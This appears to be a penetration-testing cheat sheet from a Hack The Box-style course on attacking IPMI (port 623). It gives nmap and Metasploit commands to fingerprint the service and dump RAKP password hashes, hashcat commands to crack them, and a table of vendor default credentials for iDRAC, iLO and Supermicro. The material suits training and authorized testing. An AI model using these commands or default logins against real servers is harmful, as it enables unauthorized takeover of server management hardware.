# \[623] IPMI

## \[623] IPMI

## IPMI (Port: 623)

```bash
#  Footprint the service.
Intrusionz3r0X@htb[/htb]$ sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

# Get the IPMI Version
Intrusionz3r0X@htb[/htb]$ msf6 > use auxiliary/scanner/ipmi/ipmi_version

# Metasploit Dumping Hashes
Intrusionz3r0X@htb[/htb]$ msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes  
```

**Bruteforce the hash password**

| Hash Mode | Hash name            | hash example                                                                                                                                                                |
| --------- | -------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 7300      | IPMI2 RAKP HMAC-SHA1 | b7c2d6f13a43dce2e44ad120a9cd8a13d0ca23f0414275c0bbe1070d2d1299b1c04da0f1a0f1e4e2537300263a2200000000000000000000140768617368636174:472bdabe2d5d4bffd6add7b3ba79a291d104a9ef |

```bash
Intrusionz3r0X@htb[/htb]$ hashcat -m 7300 hash /usr/share/wordlists/rockyou.txt 
Intrusionz3r0X@htb[/htb]$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

```

#### Default passwords

| **Product**     | **Username**  | **Password**                                                              |
| --------------- | ------------- | ------------------------------------------------------------------------- |
| Dell iDRAC      | root          | calvin                                                                    |
| HP iLO          | Administrator | randomized 8-character string consisting of numbers and uppercase letters |
| Supermicro IPMI | ADMIN         | ADMIN                                                                     |